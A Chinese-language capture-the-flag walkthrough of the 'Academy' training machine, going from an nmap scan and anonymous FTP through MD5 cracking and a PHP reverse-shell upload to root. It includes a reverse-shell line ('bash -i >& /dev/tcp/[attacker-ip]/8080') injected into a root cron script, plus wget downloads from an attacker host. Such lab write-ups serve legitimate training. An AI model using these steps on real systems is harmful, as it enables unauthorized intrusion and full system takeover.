LexKingz/academy-linux-pentest-walkthrough

# Academy Machine – 渗透测试 Walkthrough 本仓库记录了对 **Academy machine** 的攻陷过程，演示了从**初始侦察到获取 root 权限**的完整攻击路径。该 Walkthrough 涵盖了**服务枚举、凭据发现、Web 利用和权限提升**。 # 1. 侦察 获取目标机器的 IP 地址后，验证了连通性。 * 确认主机可用性： ``` ping [target-ip] ``` * 使用 **Nmap** 执行全端口服务扫描： ``` nmap -sC -sV -p- [target-ip] ``` 发现的开放端口： ``` 21/tcp ftp vsftpd 3.0.3 22/tcp ssh OpenSSH 7.9p1 Debian 10+deb10u2 80/tcp http Apache/2.4.38 (Debian) ``` Web 服务器信息： ``` Apache2 Debian Default Page: It works ``` ``` * screenshots/01-nmap-scan.png * screenshots/02-nmap-scan.png ``` # 2. FTP 枚举 端口 **21 (FTP)** 允许**匿名登录**。 登录 FTP 服务： ``` ftp [target-ip] ``` 在探索 FTP 服务器时，发现并下载了一个名为 **note.txt** 的文件。 ``` * screenshots/03-ftp-explored.png ``` 该文件包含说明和一个**哈希密码**。 ``` cd73502828457d15655bbd7a63fb0bc8 ``` ``` * screenshots/04-note-txt.png ``` # 3. 哈希识别与破解 使用 **hash-identifier** 识别哈希类型。 ``` * screenshots/05-hash-identify.png ``` 识别出哈希类型为 **MD5**。 使用 **hashcat** 配合 rockyou 字典破解哈希。 ``` hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt ``` ``` * screenshots/06-crack-pswd-hash1.png * screenshots/06b-crack-pswd-hash2.png ``` 破解出的密码为： ``` student ``` # 4. Web 目录枚举 使用 **ffuf** 进行目录枚举。 ``` sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://TARGET-IP/FUZZ ``` ``` * screenshots/07-fuff-dirbusting.png ``` 发现的目录包括： ``` /academy /phpmyadmin ``` # 5. Web 应用程序访问 `/academy` 目录包含一个**登录页面**。 ``` * screenshots/08-academy-dir-explore.png ``` 使用先前发现的凭据成功登录。随后更改了密码。 ``` * screenshots/09-login-password-changed.png ``` # 6. 文件上传漏洞利用 在用户个人资料页面中，发现了一个**图片上传功能**。 该应用程序**未验证文件类型**，允许任意文件上传。 为了确认上传目录路径，上传了一个测试图片。 ``` * screenshots/10-profile-page-present-directory.png ``` # 7. Reverse Shell 上传 使用了来自 PentestMonkey 的 **PHP reverse shell**。 ``` * screenshots/11-reverse-shell-payload.png ``` 在攻击者机器上使用 Netcat 开启监听器： ``` nc -nvlp [port] ``` 上传 reverse shell 文件后，成功获取了 shell 连接。 ``` * screenshots/12-gain-shell-access.png ``` 初始 shell 访问权限为： ``` www-data ``` # 8. 权限提升枚举 为了搜索权限提升路径，使用了 **LinPEAS**。 从以下地址下载 LinPEAS： ``` https://github.com/peass-ng/PEASS-ng ``` 从攻击者机器提供文件服务： ``` python3 -m http.server 80 ``` ``` * screenshots/13-python-server.png ``` 在目标机器上下载文件： ``` wget http://[attacker-ip]/linpeas.sh ``` ``` * screenshots/14-linpeas-uploaded-to-victim.png ``` 赋予文件执行权限并运行： ``` chmod +x linpeas.sh ./linpeas.sh ``` ``` * screenshots/15-chmod-run-linpeas.png ``` 枚举结果如下： ``` * screenshots/16-forensic-analysis1.png * screenshots/17-forensic-analysis2.png * screenshots/18-forensic-analysis3.png ``` # 9. 以另一用户身份进行 SSH 访问 进一步分析揭示了一个**名为 `grimmie` 的管理员账户**以及一个**重复使用的密码**。 使用这些凭据获得了 SSH 访问权限。 ``` * screenshots/19-admin-shell-gained.png ``` 当前用户访问权限： ``` grimmie ``` # 10. 调查计划任务 在 `/home/grimmie` 目录中，发现了一个名为 **backup.sh** 的脚本。 ``` * screenshots/20-backup-sh-file.png ``` 该脚本似乎用于执行定期备份。 为了监控后台进程，使用了 **pspy64**。 下载并分发该工具： ``` python3 -m http.server 80 ``` 在目标机器上下载： ``` wget http://[attacker-ip]/pspy64 ``` 赋予执行权限并运行： ``` chmod +x pspy64 ./pspy64 ``` ``` * screenshots/21-run-pspy64-1.png * screenshots/22-run-pspy64-2.png ``` 该工具显示 **backup.sh 每分钟以 root 权限执行一次**。 # 11. 通过脚本滥用进行权限提升 修改了现有脚本以包含 **reverse shell payload**。 原始脚本： ``` * screenshots/23-previous-bash-sh.png ``` ``` #!/bin/bash rm /tmp/backup.zip zip -r /tmp/backup.zip /var/www/html/academy/includes chmod 700 /tmp/backup.zip ``` 修改后的脚本： ``` * screenshots/24-modified-backup-sh.png ``` 添加了一行 reverse shell 代码： ``` bash -i >& /dev/tcp/[attacker-ip]/8080 0>&1 ``` 在攻击者机器上启动监听器： ``` nc -nvlp 8080 ``` 当计划的备份任务执行时，成功获取了 **root shell**。 ``` * screenshots/25-gained-root-shell.png ``` # 成功获取 Root 权限 最终权限级别： ``` root ``` # 展示的关键技能 * FTP 枚举和匿名登录利用 * 使用 Hashcat 进行哈希识别和密码破解 * 使用 FFUF 进行 Web 目录暴力破解 * 通过不安全文件上传进行 Web 应用程序利用 * Reverse Shell 部署 * 使用 LinPEAS 进行 Linux 权限提升枚举 * 使用 pspy64 监控系统进程 * 滥用以 root 权限运行的计划脚本 * 多用户权限提升技术

标签：Bitdefender, CSV导出, CTI, FFUF, FTP 匿名登录, Hashcat, HTTP工具, Linux 安全, MD5 解密, Nmap, Python3.6, Walkthrough, Web 安全, Writeup, 协议分析, 密码管理, 应用安全, 插件系统, 教育实验环境, 权限提升, 目录枚举, 移动安全, 网络安全, 网络安全审计, 虚拟驱动器, 隐私保护, 靶机实战